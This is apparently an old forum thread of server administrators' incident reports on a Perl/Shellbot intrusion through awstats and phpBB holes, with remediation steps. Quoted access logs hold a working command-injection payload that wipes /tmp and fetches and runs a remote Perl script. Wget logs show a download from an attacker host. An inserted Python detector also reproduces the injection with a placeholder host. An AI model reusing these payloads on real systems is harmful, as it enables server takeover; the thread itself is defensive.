Upgrade phpBB as soon as possible if you are running an old version!
Old phpBB versions are vulnerable to a Perl exploit that creates an IRC channel.
Here, in English, is what I posted in a few other forums:
Code:
One of our servers was attacked today with a Perl/Shelbot.
This is what I retrieved from the http access log:
193.24.211.85 - - [16/Oct/2005:17:10:19 +0100] "GET ///awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/k1dkid/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo| HTTP/1.1" 404 276 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
193.24.211.85 - - [16/Oct/2005:17:10:19 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/k1dkid/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo| HTTP/1.1" 404 282 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
193.24.211.85 - - [16/Oct/2005:17:10:19 +0100] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/k1dkid/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo| HTTP/1.1" 404 282 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
193.24.211.85 - - [16/Oct/2005:17:10:19 +0100] "GET /cgi/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/k1dkid/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo| HTTP/1.1" 404 278 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
193.24.211.85 - - [16/Oct/2005:17:10:19 +0100] "GET /awstats.pl/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/k1dkid/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo| HTTP/1.1" 404 285 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
193.24.211.85 - - [16/Oct/2005:17:10:19 +0100] "GET /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/k1dkid/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo| HTTP/1.1" 404 280 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
193.24.211.85 - - [16/Oct/2005:17:10:19 +0100] "GET /stats/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/k1dkid/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo| HTTP/1.1" 404 288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
193.24.211.85 - - [16/Oct/2005:17:10:19 +0100] "GET /stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/k1dkid/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo| HTTP/1.1" 404 288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
193.24.211.85 - - [16/Oct/2005:17:10:19 +0100] "GET //cgi-bin/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/k1dkid/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo| HTTP/1.1" 404 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
Code:
this loaded an apache service on port 443 with the root user.
And a huge apache mod_perl usage of resources by that
I restarted the httpd server and got this message:
(98)Address already in use: make_sock: could not bind to address [::]:443
I did a ps -auxf and saw that there were 2 apache processes running as root
Then:
#fuser 443/tcp
443/tcp: xxxx yyyy zzzz <- processes using 443
#kill -9 xxxx yyyy zzzz
#service httpd start
And everything worked fine again.
Code:
I see that this was also downloaded: http://uyx.lithyum.org/sess_
This is what I found many times in the http error log:
--19:46:20-- http://uyx.lithyum.org/sess_
=> `sess_'
Resolving uyx.lithyum.org... 69.57.134.47
Connecting to uyx.lithyum.org|69.57.134.47|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 27,334 (27K) [text/plain]
0K .......... .......... ...... 100% 45.45 KB/s
19:46:21 (45.45 KB/s) - `sess_' saved [27334/27334]
Code:
Well after looking, we do not even have awstats, so it's really weird.
The guys on this forum have the same problem, also no awstats:
http://forum.dshield.org/read.php?3,...2243#msg-22243
By the way, I'm running CentOS 4.1, Ensim 4.0.4 and was running php 4.3.9, updated it now to 4.4.0 with the rpms from Cheetahweb, but still there was an attack there.
Now I chmoded wget to 600 and located the site which was attacked on the server, disabled mod_perl and CGI, and blocked some IPs; it seems to have solved the vulnerability, but I'm not sure.
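As an added example (not from the original post or any of the forums quoted here), a small Python detector for the awstats.pl configdir injection pattern seen in the access log above; it flags the attempts, pulls out the download URL in the payload, and reports whether any attempt was actually served (the 404s above mean the script was absent and nothing ran). The sample log lines, IPs and dropper host are constructed placeholders.

```python
import re
from urllib.parse import unquote
# Apache combined log: ip ident user [time] "METHOD target PROTO" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"$'
)
# Shell metacharacters that never belong in a legitimate awstats configdir value.
SHELL_META = re.compile(r'[|;`$&]')

# Constructed sample lines modelled on the log quoted above (placeholder IPs and dropper host).
SAMPLE_LOG = """\
192.0.2.10 - - [16/Oct/2005:17:10:19 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://dropper.example/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo| HTTP/1.1" 404 282 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
192.0.2.10 - - [16/Oct/2005:17:10:19 +0100] "GET /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://dropper.example/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo| HTTP/1.1" 404 280 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
198.51.100.7 - - [16/Oct/2005:17:12:03 +0100] "GET /cgi-bin/awstats.pl?config=site&configdir=/etc/awstats HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [16/Oct/2005:17:12:04 +0100] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

def parse_line(line):
    """Split one combined-format line into its fields; None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def awstats_injection(target):
    """Decoded configdir value when awstats.pl is hit with shell metacharacters, else None."""
    path, _, query = target.partition('?')
    if not path.lower().endswith('awstats.pl'):
        return None
    for pair in query.split('&'):  # split by hand: older parse_qs also splits on ';'
        key, _, value = pair.partition('=')
        decoded = unquote(value)
        if key == 'configdir' and SHELL_META.search(decoded):
            return decoded
    return None

def scan(lines):
    """One finding per injection attempt: source IP, status, decoded payload, download URLs."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        payload = awstats_injection(rec['target']) if rec else None
        if payload is not None:
            findings.append({'ip': rec['ip'], 'status': int(rec['status']), 'payload': payload,
                             'urls': re.findall(r'https?://[^\s;|]+', payload)})
    return findings

def any_executed(findings):
    """True if an attempt got a 2xx (awstats.pl was present to run it); a 404 means nothing ran."""
    return any(200 <= f['status'] < 300 for f in findings)
```

Run it over the real access log and, as the later posts in this thread show, a clean result here does not rule out another entry point such as an unpatched phpBB.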
Code:
Hi,
I found this thread while doing a postmortem of the break-in by this UYX dude. My case is similar: unpatched phpBB allowed the upload of arbitrary files,
giving this dude access to the system by using the phpBB highlight Exploit
(discussed in several places in the phpBB community forums).
Incidentally, I got to interact with him, on the #uruguay channel of the irc.com.ve server (that evidently has also been compromised).
The guy boasts that he controls many machines using IRC zombies that routinely search for vulnerable systems,
and that I should behave nicely, otherwise he'd "rm -rf /" my server.
The guy is Spanish speaking, and certainly he uses Uruguayan modisms.
At the irc.com.ve's #uruguay IRC channel,
you can see a URL displayed as the MOTD: k4boom.biz/tools,
which contains several tools for system intrusion. Anyway.... it looks like UYX wants to install IRC daemons to increase his....
I don't know what he wants to accomplish.
In my case, I did this:
- temporarily remove support for PHP on the system
- Kill the IRC daemon
- As I was getting tons of requests from several IRC zombies, I closed port 6667.
- Delete the files that were left all over the machine:
/var/local/.0 This directory contained the IRC sources
/usr/bin/http The IRC daemon
/sbin/ttyload and /sbin/ttymon, a couple of daemons at first running on port 1, later on what seemed to be random ports, that were used to monitor activity in my system and execute commands remotely as root
/bin/ls /bin/ps /sbin/ifconfig /sbin/ps and several others, that I identified in two ways: The files were protected (see the chattr man page) with the attributes "i", "a" and "s". Most of these files were owned by uid 122, gid 144
- Ran rkhunter, which identified two rootkits: SHV4 and SHV5, and several additional compromised files in the system.
- Reloaded the system with safe files.
- In my case, I did not have to patch phpBB, as my users don't use it, I just got rid of it, but I'm sure others will not have this luxury.
- Restored PHP
Hope this helps.
Code:
I see that I haven't mentioned one thing...
Since I have apf running on the server, there are only a few inbound and outbound ports allowed.
What this Shellbot did was use port 443 (https), and when apache came down (or when "it" managed to stop the httpd service) it took this port for the Shellbot.
I ran rkhunter, no problems (well, I was on the server when the attack took place so I could take action while the attack took place).
I haven't had any attacks since 10-17-2005, after the measures that I took.
This solved the problem; I hope it is of some use to you!